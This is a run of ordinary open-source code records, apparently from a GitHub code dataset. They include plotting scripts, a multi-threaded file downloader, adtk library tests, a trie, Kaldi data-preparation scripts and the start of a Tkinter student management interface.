utils.data import dump, load\nfrom matplotlib import rcParams\nrcParams.update({'figure.autolayout': True})\n\n\ndef get_data():\n dataset = \"sutter\"\n level = 2\n import os\n results = dd(list)\n xs = {}\n for file in os.listdir(\"/home/yzhang3151/project/AutoPrescribe2/data\"):\n if file.endswith(\".pkl\") and file.startswith(\"%s_%s\" % (dataset, level)):\n d = file.split(\"_\")\n results[d[2]].append((int(d[5][1:]), int(d[6][1:]), float(d[7].replace(\"jacc\", \"\"))))\n\n for k in results:\n xs[k] = [y[2] for y in sorted(results[k], key=lambda x: (x[0], x[1]))]\n\n dump(xs, \"traj_%s_%s.pkl\" % (dataset, level))\n\n xs = load(\"traj_%s_%s.pkl\" % (dataset, level))\n\n name_mapping = {\n \"voc\": \"Vocabulary\",\n \"random\": \"Random\",\n \"freq\": \"Frequent first\",\n \"rare\": \"Rare first\"\n }\n line_type = {\n \"random\": \"-\",\n \"freq\": \"--\",\n \"rare\": \"s\",\n \"voc\": \"^\"\n }\n\n\n fig, ax = plt.subplots(figsize=(8, 4))\n\n for k in name_mapping:\n line, = ax.plot([x for x in xs[k]][:len(xs[\"random\"])], line_type[k], linewidth=2, label=name_mapping[k])\n\n # x = np.linspace(0, 10, 500)\n # dashes = [10, 5, 100, 5] # 10 points on, 5 off, 100 on, 5 off\n #\n # line1, = ax.plot(x, np.sin(x), '--', linewidth=2,\n # label='Dashes set retroactively')\n # line1.set_dashes(dashes)\n #\n # line2, = ax.plot(x, -1 * np.sin(x), dashes=[30, 5, 10, 5],\n # label='Dashes set proactively')\n ax.set_xlabel(\"Epochs\", fontsize=20)\n ax.set_ylabel(\"Jaccard Coefficient\", fontsize=20)\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(15)\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(15)\n ax.legend(loc='lower right', fontsize=20)\n # plt.show()\n fig.tight_layout()\n plt.savefig(\"traj_%s_%s.pdf\" % (dataset, level))\n\n\ndef plot_rf(f_name):\n dataset = \"sutter\"\n level = 2\n f_name = \"reinforce_reward_%s_%s_random_per_1.txt\" % (dataset, level)\n results = []\n for i, line in enumerate(open(f_name)):\n if i % 20 == 0:\n x = line.strip().split()\n # if x[1] == '0':\n results.append(float(x[2]))\n\n fig, ax = plt.subplots(figsize=(4, 3))\n ax.set_xlabel(\"Epochs\", fontsize=20)\n ax.set_ylabel(\"Average Reward\", fontsize=20)\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(15)\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(15)\n\n line, = ax.plot(results, '-', linewidth=2)\n\n\n # ax.legend(loc='lower right', fontsize=20)\n # plt.show()\n fig.tight_layout()\n plt.savefig(\"rf_traj_%s_%s.pdf\" % (dataset, level))\n\ndef plot_rf_mimic():\n dataset = \"mimic\"\n level = 2\n f_name = \"reinforce_reward_%s_%s_per_1.txt\" % (dataset, level)\n results = []\n for i, line in enumerate(open(f_name)):\n if i % 20 == 0:\n x = line.strip().split()\n # if x[1] == '0':\n results.append(float(x[2]))\n\n fig, ax = plt.subplots(figsize=(4, 3))\n ax.set_xlabel(\"Epochs\", fontsize=20)\n ax.set_ylabel(\"Average Reward\", fontsize=20)\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(15)\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(15)\n\n line, = ax.plot(results, '-', linewidth=2)\n\n\n # ax.legend(loc='lower right', fontsize=20)\n # plt.show()\n fig.tight_layout()\n plt.savefig(\"rf_traj_%s_%s.pdf\" % (dataset, level))\n\ndef plot_bar():\n x = [1.15, 0.74, 0.48, 0.49, 0.63]\n labels = [\"LEAP\", \"Basic LEAP\", \"Classifier Chains\", \"Softmax MLP\", 'K-Most frequent']\n fig, ax = plt.subplots(figsize=(4, 2.5))\n ax.set_ylabel(\"Average Score\", fontsize=20)\n ax.set_ylim(0, 
1.6)\n    for j in range(len(x)):\n        ax.bar(j, x[j], width=0.5, bottom=0.0, align='center', alpha=0.6, label=labels[j])\n    ax.xaxis.set_ticklabels([])\n    for tick in ax.yaxis.get_major_ticks():\n        tick.label.set_fontsize(15)\n    ax.legend()\n    plt.savefig(\"subjective.pdf\")\n","repo_name":"neozhangthe1/AutoPrescribe","sub_path":"utils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"6"} {"seq_id":"5423291735","text":"'''\n@author:KongWeiKun\n@file: another.py\n@time: 18-3-24 3:45 PM\n@contact: 836242657@qq.com\n'''\nimport sys\nimport requests\nimport threading\nimport datetime\n\n# URL of the file to download, passed in as a command-line argument\nurl = 'http://archive.ics.uci.edu/ml/machine-learning-databases/00203/YearPredictionMSD.txt.zip'\n\n\ndef Handler(start, end, url, filename):\n    headers = {'Range': 'bytes=%d-%d' % (start, end)}\n    r = requests.get(url, headers=headers, stream=True)\n    print(\"Size of this write: %.3f MB\"%float(int(r.headers['content-length'])/1024/1024))\n    # write to the corresponding position in the file\n    with open(filename, \"r+b\") as fp:\n        fp.seek(start)\n        var = fp.tell()\n        for data in r.iter_content(chunk_size=1024):\n            fp.write(data)\n\n\n\ndef download_file(url, num_thread=10):\n    r = requests.head(url)\n    try:\n        file_name = url.split('/')[-1]\n        file_size = int(\n            r.headers['content-length']) # Content-Length gives the size of the file body; when the http server uses Connection:keep-alive, Content-Length is not supported\n    except:\n        print(\"Check the URL, or multi-threaded download is not supported\")\n        return\n    sys.stdout.write(' %s file size: %0.2f MB\\n' % (file_name, file_size / 1024 / 1024))\n    # create a file the same size as the file to be downloaded\n    fp = open(file_name, \"wb\")\n    # create the file\n    fp.truncate(file_size)\n    fp.close()\n\n    # start multiple threads to write the file\n    print(\"Creating multiple threads to write the file\")\n    part = file_size // num_thread # if it does not divide evenly, the last chunk should have a few extra bytes\n    print(\"Split into parts of {} bytes each\".format(part))\n    for i in range(num_thread):\n        start = part * i\n        if i == num_thread - 1: # the last chunk\n            end = file_size\n        else:\n            end = start + part\n        print(\"Start: {} End: {}\".format(start,end))\n        t = threading.Thread(target=Handler, kwargs={'start': start, 'end': end, 'url': url, 'filename': file_name})\n        t.setDaemon(True)\n        t.start()\n\n    # wait for all threads to finish downloading\n    main_thread = threading.current_thread()\n    for t in threading.enumerate():\n        if t is main_thread:\n            continue\n        t.join()\n    print('%s download complete' % file_name)\n\n\nif __name__ == '__main__':\n    start = datetime.datetime.now().replace(microsecond=0)\n    download_file(url)\n    end = datetime.datetime.now().replace(microsecond=0)\n    print(\"Time elapsed: \", end='')\n    print(end - start)","repo_name":"Winniekun/spider","sub_path":"downloader/file_downloader.py","file_name":"file_downloader.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"6"} {"seq_id":"37129737959","text":"data_types = {\n    0xFD: 'Light',\n    0xFE: 'Temperature',\n    0xF9: 'Status',\n    0xF6: 'Ultrasoon'\n}\n\n\nclass DataReader:\n    @staticmethod\n    def decode_and_return_data(data):\n        current_data_type = None\n        sequence_start_index = 0\n        sequence_started = False\n\n        temp_data = {}\n\n        for i in range(len(data)):\n            if data[i] in data_types.keys() and not sequence_started:\n                current_data_type = data[i]\n                sequence_start_index = i + 1\n                sequence_started = True\n\n            if sequence_started:\n                if data[i] == 0x0A and data[i - 1] == current_data_type and data[i - 2] == 0x00:\n                    sequence_started = False\n                    sequence_stop_index = i - 2\n\n                    if current_data_type in temp_data.keys():\n                        temp_data[current_data_type].extend(data[sequence_start_index:sequence_stop_index])\n                    else:\n                        temp_data[current_data_type] = 
data[sequence_start_index:sequence_stop_index]\n\n                    current_data_type = None\n\n        return temp_data\n","repo_name":"Bloomdex/2.1-embedded-systems","sub_path":"Basestation/serialcontrol/datareader.py","file_name":"datareader.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} {"seq_id":"45364269166","text":"from Game.Shared import *\r\n\r\nclass Pad(GameObject):\r\n\r\n    def __init__(self , position , sprite):\r\n        super(Pad, self).__init__(position, GameConstant.PAD_SIZE, sprite)\r\n\r\n    def setPosition(self , position):\r\n        newPosition = [position[0] , position[1]]\r\n        size = self.getSize()\r\n\r\n        if newPosition[0] + size[0] >= GameConstant.SCREEN_SIZE[0]:\r\n            newPosition[0] = GameConstant.SCREEN_SIZE[0] - size[0]\r\n\r\n        super(Pad, self).setPosition(newPosition)\r\n","repo_name":"grapeJUICE1/Grape-Bricks","sub_path":"Game/Pad.py","file_name":"Pad.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} {"seq_id":"5516586203","text":"import os\nimport fnmatch\nimport shutil\n\n\ndef is_file_match(filename, patterns):\n    for pattern in patterns:\n        print(pattern)\n        if fnmatch.fnmatch(filename, pattern):\n            return True\n    return False\n\n\ndef find_special_files(root, patterns=['*'], exclude_dirs=[], exclude_patterns=[], exclude_files=['.DS_Store', 'Thumbs.db']):\n    for root, dirnames, filenames in os.walk(root):\n        for filename in filenames:\n            print(filename)\n            if filename not in exclude_files:\n                if is_file_match(filename, patterns):\n                    if is_file_match(filename, exclude_patterns) == False:\n                        yield os.path.join(root, filename)\n        for d in exclude_dirs:\n            if d in dirnames:\n                dirnames.remove(d)\n\n\nif __name__ == '__main__':\n    # old_path = input(\"Path where the files are located:\")\n    # root_path = r\"C:\\Output\"\n    root_path = r\"{}\".format(input(\"Path of the rotated videos: \"))\n    root_new_path = r\"{}\".format(input(\"Path of the videos to be replaced: \"))\n    # root_new_path = r\"\\\\dtc-fs\\SmartCar\\DMS_Test\\Face_Video_Test_Set\\1_raw_data\\0526\\A1\\003\"\n    txt_list = list(find_special_files(root_path, patterns=['*.avi'], exclude_dirs=[], exclude_patterns=[],exclude_files=['.DS_Store', 'Thumbs.db', '*_keyframe.txt']))\n    txt_list_new_path = list(find_special_files(root_new_path, patterns=['*.avi'], exclude_dirs=[], exclude_patterns=[],\n                                                exclude_files=['.DS_Store', 'Thumbs.db', '*_keyframe.txt']))\n\n    for item_path in txt_list_new_path:\n        print(\"item_path\", item_path)\n        item_new_path = os.path.basename(os.path.splitext(item_path)[0])\n        print(\"item_new_path\", item_new_path)\n        for item in txt_list:\n            print('item', item)\n            item_root = os.path.basename(os.path.splitext(item)[0])\n            print(\"item_root\", item_root)\n            if item_root.find(item_new_path, 0, len(item_root)-1) == 0:\n                shutil.move(item, item_path)\n    print(\"Move finished\")\n\n\n","repo_name":"2372254825/tool_clip","sub_path":"clip/move_file.py","file_name":"move_file.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"30329958577","text":"\"Check if the series name or column name is correctly kept.\"\n\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom sklearn.cluster import KMeans\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.neighbors import LocalOutlierFactor\n\nimport adtk.detector as detector\nimport adtk.transformer as transformer\nfrom adtk._base import _TrainableModel\nfrom 
adtk._detector_base import ( # _NonTrainableMultivariateDetector,\n _NonTrainableUnivariateDetector,\n _TrainableMultivariateDetector,\n _TrainableUnivariateDetector,\n)\n\n_Detector = (\n _NonTrainableUnivariateDetector,\n # _NonTrainableMultivariateDetector,\n _TrainableUnivariateDetector,\n _TrainableMultivariateDetector,\n)\n\n# We have 4 types of models\n# - one-to-one: input a univariate series, output a univariate series\n# - one-to-many: input a univariate series, output a multivariate series\n# - many-to-one: input a multivariate series, output a univariate series\n# - many-to-many: input a multivariate series, output a multivariate series\n\none2one_models = [\n detector.ThresholdAD(),\n detector.QuantileAD(),\n detector.InterQuartileRangeAD(),\n detector.GeneralizedESDTestAD(),\n detector.PersistAD(window=10),\n detector.LevelShiftAD(window=10),\n detector.VolatilityShiftAD(window=10),\n detector.AutoregressionAD(),\n detector.SeasonalAD(freq=2),\n transformer.RollingAggregate(window=10, agg=\"median\"),\n transformer.RollingAggregate(\n window=10, agg=\"quantile\", agg_params={\"q\": 0.5}\n ),\n transformer.DoubleRollingAggregate(window=10, agg=\"median\"),\n transformer.DoubleRollingAggregate(\n window=10, agg=\"quantile\", agg_params={\"q\": [0.1, 0.5, 0.9]}\n ),\n transformer.DoubleRollingAggregate(\n window=10, agg=\"hist\", agg_params={\"bins\": [30, 50, 70]}\n ),\n transformer.StandardScale(),\n transformer.ClassicSeasonalDecomposition(freq=2),\n]\n\none2many_models = [\n transformer.RollingAggregate(\n window=10, agg=\"quantile\", agg_params={\"q\": [0.1, 0.5, 0.9]}\n ),\n transformer.RollingAggregate(\n window=10, agg=\"hist\", agg_params={\"bins\": [20, 50, 80]}\n ),\n transformer.Retrospect(n_steps=3),\n]\n\nmany2one_models = [\n detector.MinClusterDetector(KMeans(n_clusters=2)),\n detector.OutlierDetector(\n LocalOutlierFactor(n_neighbors=20, contamination=0.1)\n ),\n detector.RegressionAD(target=\"A\", regressor=LinearRegression()),\n detector.PcaAD(),\n transformer.SumAll(),\n transformer.RegressionResidual(target=\"A\", regressor=LinearRegression()),\n transformer.PcaReconstructionError(),\n]\n\n\n@pytest.mark.parametrize(\"model\", one2one_models)\ndef test_one2one_s2s_w_name(model):\n \"\"\"\n if a one-to-one model is applied to a Series, it should keep the Series\n name unchanged\n \"\"\"\n s_name = pd.Series(\n np.arange(100),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n name=\"A\",\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(s_name)\n else:\n result = model.predict(s_name)\n assert result.name == \"A\"\n\n\n@pytest.mark.parametrize(\"model\", one2one_models)\ndef test_one2one_s2s_wo_name(model):\n \"\"\"\n if a one-to-one model is applied to a Series, it should keep the Series\n name unchanged\n \"\"\"\n s_no_name = pd.Series(\n np.arange(100),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(s_no_name)\n else:\n result = model.predict(s_no_name)\n assert result.name is None\n\n\n@pytest.mark.parametrize(\"model\", one2one_models)\ndef test_one2one_df2df(model):\n \"\"\"\n if a one-to-one model is applied to a DataFrame, it should keep the column\n names unchanged\n \"\"\"\n df = pd.DataFrame(\n np.arange(300).reshape(100, 3),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n columns=[\"A\", \"B\", \"C\"],\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(df)\n else:\n 
result = model.predict(df)\n assert list(result.columns) == [\"A\", \"B\", \"C\"]\n\n\n@pytest.mark.parametrize(\"model\", one2one_models)\ndef test_one2one_df2list(model):\n \"\"\"\n if a one-to-one model (detector) is applied to a DataFrame and returns a\n dict, the output dict keys should match the input column names\n \"\"\"\n if isinstance(model, _Detector):\n df = pd.DataFrame(\n np.arange(300).reshape(100, 3),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n columns=[\"A\", \"B\", \"C\"],\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_detect(df, return_list=True)\n else:\n result = model.detect(df, return_list=True)\n if sys.version_info[1] >= 6:\n assert list(result.keys()) == [\"A\", \"B\", \"C\"]\n else:\n assert set(result.keys()) == {\"A\", \"B\", \"C\"}\n\n\n@pytest.mark.parametrize(\"model\", one2many_models)\ndef test_one2many_s2df_w_name(model):\n \"\"\"\n if a one-to-many model is applied to a Series, the output should not have\n prefix in column names, no matter whether the input Series has a name.\n \"\"\"\n s_name = pd.Series(\n np.arange(100),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n name=\"A\",\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(s_name)\n else:\n result = model.predict(s_name)\n assert all([col[:2] != \"A_\" for col in result.columns])\n\n\n@pytest.mark.parametrize(\"model\", one2many_models)\ndef test_one2many_s2df_wo_name(model):\n \"\"\"\n if a one-to-many model is applied to a Series, the output should not have\n prefix in column names, no matter whether the input Series has a name.\n \"\"\"\n s_no_name = pd.Series(\n np.arange(100),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(s_no_name)\n else:\n result = model.predict(s_no_name)\n assert all([col[:2] != \"A_\" for col in result.columns])\n\n\n@pytest.mark.parametrize(\"model\", one2many_models)\ndef test_one2many_df2df(model):\n \"\"\"\n if a one-to-many model is applied to a DataFrame, the output should have\n prefix in column names to indicate the input columns they correspond.\n \"\"\"\n df = pd.DataFrame(\n np.arange(300).reshape(100, 3),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n columns=[\"A\", \"B\", \"C\"],\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(df)\n else:\n result = model.predict(df)\n n_cols = round(len(result.columns) / 3)\n assert all([col[:2] == \"A_\" for col in result.columns[:n_cols]])\n assert all([col[2:4] != \"A_\" for col in result.columns[:n_cols]])\n assert all(\n [col[:2] == \"B_\" for col in result.columns[n_cols : 2 * n_cols]]\n )\n assert all(\n [col[2:4] != \"B_\" for col in result.columns[n_cols : 2 * n_cols]]\n )\n assert all([col[:2] == \"C_\" for col in result.columns[2 * n_cols :]])\n assert all([col[2:4] != \"C_\" for col in result.columns[2 * n_cols :]])\n\n\n@pytest.mark.parametrize(\"model\", many2one_models)\ndef test_many2one(model):\n \"\"\"\n The output Series from a many-to-one model should NOT have name\n \"\"\"\n df = pd.DataFrame(\n np.arange(300).reshape(100, 3),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n columns=[\"A\", \"B\", \"C\"],\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(df)\n else:\n result = model.predict(df)\n assert result.name is None\n\n\ndef test_pca_reconstruction():\n df = pd.DataFrame(\n np.arange(300).reshape(100, 3),\n 
index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n columns=[\"A\", \"B\", \"C\"],\n )\n result = transformer.PcaReconstruction(k=2).fit_predict(df)\n assert list(result.columns) == [\"A\", \"B\", \"C\"]\n","repo_name":"arundo/adtk","sub_path":"tests/test_series_name.py","file_name":"test_series_name.py","file_ext":"py","file_size_in_byte":8053,"program_lang":"python","lang":"en","doc_type":"code","stars":980,"dataset":"github-code","pt":"6"} +{"seq_id":"10928166867","text":"#-------------------------------------#\n# 对单张图片进行预测\n#-------------------------------------#\nfrom yolo import YOLO\nfrom PIL import Image\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '2,3,4'\nyolo = YOLO()\n\nwhile True:\n img = input('Input image filename:')\n try:\n image = Image.open(img)\n except:\n print('Open Error! Try again!')\n continue\n else:\n r_image = yolo.detect_image(image)\n r_image.save('img/street_result.jpg')\n # r_image.show()\n","repo_name":"HUxin-liang/YOLOv3","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74480128506","text":"class TrieNode(object):\n def __init__(self):\n self.is_word = False\n self.children = {}\n\n\nclass Trie(object):\n def __init__(self):\n self.root = TrieNode()\n self.word_list = []\n\n def insert(self, word):\n \"\"\"\n Add `word` to trie\n \"\"\"\n current_node = self.root\n\n for char in word:\n if char not in current_node.children:\n current_node.children[char] = TrieNode()\n current_node = current_node.children[char]\n\n current_node.is_word = True\n\n def exists(self, word):\n \"\"\"\n Check if word exists in trie\n \"\"\"\n current_node = self.root\n\n for char in word:\n if char not in current_node.children:\n return False\n current_node = current_node.children[char]\n\n return current_node.is_word\n\n def suggestionsRec(self, node, word):\n\n # Method to recursively traverse the trie\n # and return a whole word.\n if node.is_word:\n self.word_list.append(word)\n\n for a, n in node.children.items():\n self.suggestionsRec(n, word + a)\n\n def suffixes(self, suffix=''):\n node = self.root\n not_found = False\n temp_word = ''\n self.word_list = []\n\n for a in list(suffix):\n if not node.children.get(a):\n not_found = True\n break\n\n temp_word += a\n node = node.children[a]\n\n if not_found:\n print('Invalid Prefix')\n return\n elif node.is_word and not node.children:\n print('Valid Prefix but no suggestions.')\n return\n\n self.suggestionsRec(node, '')\n\n return self.word_list\n\nMyTrie = Trie()\nwordList = [\n \"ant\", \"anthology\", \"antagonist\", \"antonym\",\n \"fun\", \"function\", \"factory\",\n \"trie\", \"trigger\", \"trigonometry\", \"tripod\"\n]\nfor word in wordList:\n MyTrie.insert(word)\n\noutput = MyTrie.suffixes('trig') # ['ger', 'onometry']\nprint(output)\n\noutput = MyTrie.suffixes('')\nprint(output) # input array\n\noutput = MyTrie.suffixes('abc')\nprint(output) # invalid prefix\n\noutput = MyTrie.suffixes('trigonometry')\nprint(output) # Valid Prefix but no suggestions.","repo_name":"gokulnippani/DataStructures","sub_path":"Project_3/problem_5.py","file_name":"problem_5.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"73542097147","text":"'''\n\n클래스 명 : Ch 1\n\n설명 : 네트워크 선 자르기 입니다.\n\n작성일 : 2022.06.01\n\n수정자 : 김선진\n\n수정한 날자 : 0000.00.00\n\nTodo > \n\n현수는 네트워크 선을 1m, 
2m의 길이를 갖는 선으로 자르려고 합니다. 예를 들어 4m의 네트워크 선이 주어진다면\n\n1) 1m+1m+1m+1m \n2) 2m+1m+1m\n3) 1m+2m+1m\n4) 1m+1m+2m\n5) 2m+2m\n\n의 5가지 방법을 생각할 수 있습니다. (2)와 (3)과 (4)의 경우 왼쪽을 기준으로 자르는 위치가 다르면 다른 경우로 생각한다.\n그렇다면 네트워크 선의 길이가 Nm라면 몇 가지의 자르는 방법을 생각할 수 있나요?\n\n▣ 입력설명\n\n첫째 줄은 네트워크 선의 총 길이인 자연수 N(3≤N≤45)이 주어집니다.\n\n▣ 출력설명\n\n첫 번째 줄에 자르는 방법의 수를 출력한다.\n\n\n▣ 입력예제 \n\n7\n\n▣ 출력예제 \n\n21\n\n'''\n\nimport sys\nfrom collections import deque\n\n\n# 탑 다운 (메모이제이션)\ndef dynamic(N, count_list):\n\n    if count_list[N] != 0:\n        return count_list[N]\n\n    if N == 1:\n        return 1\n\n    if N == 2:\n        return 2\n    \n    count_list[N] = dynamic(N-1, count_list) + dynamic(N-2, count_list)\n\n    return count_list[N]\n\n# 바텀 업\ndef dynamicWithFor(N, count_list):\n\n    for i in range(1,N+1):\n        if i == 1:\n            count_list[i] = 1\n        elif i == 2:\n            count_list[i] = 2\n        else :\n            count_list[i] = count_list[i-1] + count_list[i-2]\n    \n    return count_list[N]\n\n\n\ndef logic(input_file_path, output_file_path):\n\n    sys.stdin = open(input_file_path, \"rt\")\n\n    result = 0\n\n    N = int(input())\n\n    count_list = [0 for _ in range(N+1)]\n\n    result = dynamic(N, count_list)\n\n    sys.stdin = open(output_file_path, \"rt\")\n    \n    answer = int(input())\n\n    print(f\"{input_file_path} : {result == answer}\")\n\n\nif __name__ == \"__main__\":\n    for i in range(1, 2):\n        logic(f\"in{i}.txt\", f\"out{i}.txt\")","repo_name":"gimseonjin/CodingTest","sub_path":"section8/1, 2. 네트워크 선 자르기/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"70761879229","text":"# aishell1的transcript文件中的说话人编号BAC009S0002W0122 转换成AISHELL2格式 IS0002W0122\n# 因为aishell2采用结巴分词,移除标注的空格\n\nnew_transcripts = []\n# 注意编码方式,开头有个\\ufeff字符\naishell_transcripts = open(\"./aishell_transcript_v0.8_nospace.txt\", \"r\", encoding=\"utf-8-sig\")\n\ntranscripts = aishell_transcripts.readlines()\n# 默认编码方式为utf-8\ntrans_txt = open(\"./trans.txt\", 'w')\n\nfor transcript in transcripts:\n    spkid = \"I\" + transcript[6: 16]\n    trans = transcript[16: len(transcript)]\n    new_transcripts.append(spkid + \"\\t\" + trans)  # 带了\\n因此不需要添加换行符\n\ntrans_txt.writelines(new_transcripts)\naishell_transcripts.close()\ntrans_txt.close()\n\n\nimport glob\nimport os\n\ndatadir = \"/users/liuli/database/aishellv1/data_aishell/wav/\"\n\nfor set in [\"train\", \"dev\", \"test\"]:\n    new_wav_scp = []\n    set_path = os.path.join(datadir, set)\n    list_wav = glob.glob(os.path.join(set_path, \"*/*.wav\"))\n\n    wav_scp = open(\"wav.scp.\" + set, \"w\")\n\n    for filepath in list_wav:\n        filename = os.path.basename(filepath)\n        spkid = \"I\" + filename[6: 16]\n        relative_path = filepath.replace(set_path + \"/\", \"\")\n        new_wav_scp.append(spkid + \"\\t\" + relative_path + \"\\n\")\n\n    wav_scp.writelines(new_wav_scp)\n    wav_scp.close()\n\n    cp_trans = \"cp trans.txt \" + set_path\n    cp_wav = \"cp wav.scp.\" + set + \" \" + set_path + \"/wav.scp\"\n    os.system(cp_trans)\n    os.system(cp_wav)\n","repo_name":"liuli1996/kaldi_kws","sub_path":"s5/prepare_data/prepare_files.py","file_name":"prepare_files.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
{"seq_id":"74575733626","text":"from django.shortcuts import render\n\nfrom core.models import Transaction\nfrom core.section import Section\nsection = Section()\nsection.actionbar = True\nsection.breadcrumb = True\n\ndef index_view(request):\n    \n    section.page_title = \"Transactions\"\n    section.sidebar=False\n\n    my_list = 
Transaction.objects.all().order_by('creation_date')\n context = {\n 'section': section,\n 'query_string': \"\",\n 'my_list': my_list,\n 'user': request.user, \n }\n \n return render(request, 'transactions/index.html', context)\n","repo_name":"Daniel-codemaster/Smart-Tolgate","sub_path":"transactions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"1930689771","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nfrom PIL import Image,ImageTk\r\nfrom tkinter import StringVar\r\nfrom tkinter import messagebox\r\nimport mysql.connector\r\nimport cv2\r\nfrom cv2 import CascadeClassifier\r\nclass Student:\r\n def __init__(self,root):\r\n self.root=root\r\n self.root.geometry(\"1530x790+0+0\")\r\n self.root.title(\"Face recognition System\")\r\n\r\n\r\n #~~~~~~~~~~~~variables~~~~~~~~~~~~~~~~~\r\n self.var_dep=StringVar()\r\n self.var_course=StringVar()\r\n self.var_year=StringVar()\r\n self.var_semester=StringVar()\r\n self.var_std_id=StringVar()\r\n self.var_std_name=StringVar()\r\n self.var_div=StringVar()\r\n self.var_roll=StringVar()\r\n self.var_gender=StringVar()\r\n self.var_dob=StringVar()\r\n self.var_email=StringVar()\r\n self.var_phone=StringVar()\r\n self.var_address=StringVar()\r\n self.var_teacher=StringVar()\r\n \r\n # Load and display image\r\n image=Image.open(\"face.jpg\")\r\n image=image.resize((500,130),Image.ANTIALIAS)\r\n self.photoimg=ImageTk.PhotoImage(image)\r\n\r\n label=tk.Label(self.root,image=self.photoimg)\r\n label.place(x=0,y=0, width=500,height=130)\r\n\r\n image1=Image.open(\"think.jpg\")\r\n image1=image1.resize((510,130),Image.ANTIALIAS)\r\n self.photoimg1=ImageTk.PhotoImage(image1)\r\n\r\n label=tk.Label(self.root,image=self.photoimg1)\r\n label.place(x=860,y=0, width=510,height=130)\r\n \r\n image2=Image.open(\"face.gif\")\r\n image2=image2.resize((400,130),Image.ANTIALIAS)\r\n self.photoimg2=ImageTk.PhotoImage(image2)\r\n\r\n label=tk.Label(self.root,image=self.photoimg2)\r\n label.place(x=500,y=0, width=400,height=130)\r\n\r\n image3=Image.open(\"backg.jpg\")\r\n image3=image3.resize((1370,700),Image.ANTIALIAS)\r\n self.photoimg3=ImageTk.PhotoImage(image3)\r\n\r\n bg=tk.Label(self.root,image=self.photoimg3)\r\n bg.place(x=0,y=130, width=1370,height=700)\r\n\r\n title=tk.Label(bg,text=\"STUDENT MANAGEMENT SYSTEM\", font=(\"times new roman\",25,\"bold\"),bg=\"white\",fg=\"Black\")\r\n title.place(x=0,y=0, width=1530,height=45)\r\n\r\n main_frame=tk.Frame(bg,bd=2)\r\n main_frame.place(x=5,y=50,width=1355,height=510)\r\n\r\n #left frame\r\n Left_frame=tk.LabelFrame(main_frame,bd=2,relief='solid',text=\"Student Details\", font=(\"times new roman\",12))\r\n Left_frame.place(x=10,y=10,width=660,height=490)\r\n\r\n #right frame\r\n Right_frame=tk.LabelFrame(main_frame,bd=2,relief='solid',text=\"Student Details\", font=(\"times new roman\",12))\r\n Right_frame.place(x=680,y=10,width=660,height=490)\r\n\r\n #course frame\r\n Course_frame=tk.LabelFrame(Left_frame,bd=2,bg=\"white\",relief='ridge',text=\"Current Courses\",font=('Calibri',12))\r\n Course_frame.place(x=5,y=15,width=650,height=125)\r\n \r\n #Departments\r\n department_label=tk.Label(Course_frame,text=\"Department:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n department_label.grid(row=0,column=0,padx=10)\r\n\r\n dept_combo=ttk.Combobox(Course_frame,textvariable=self.var_dep,font=('times new roman',12,\"bold\"),width=17,state=\"readonly\")\r\n 
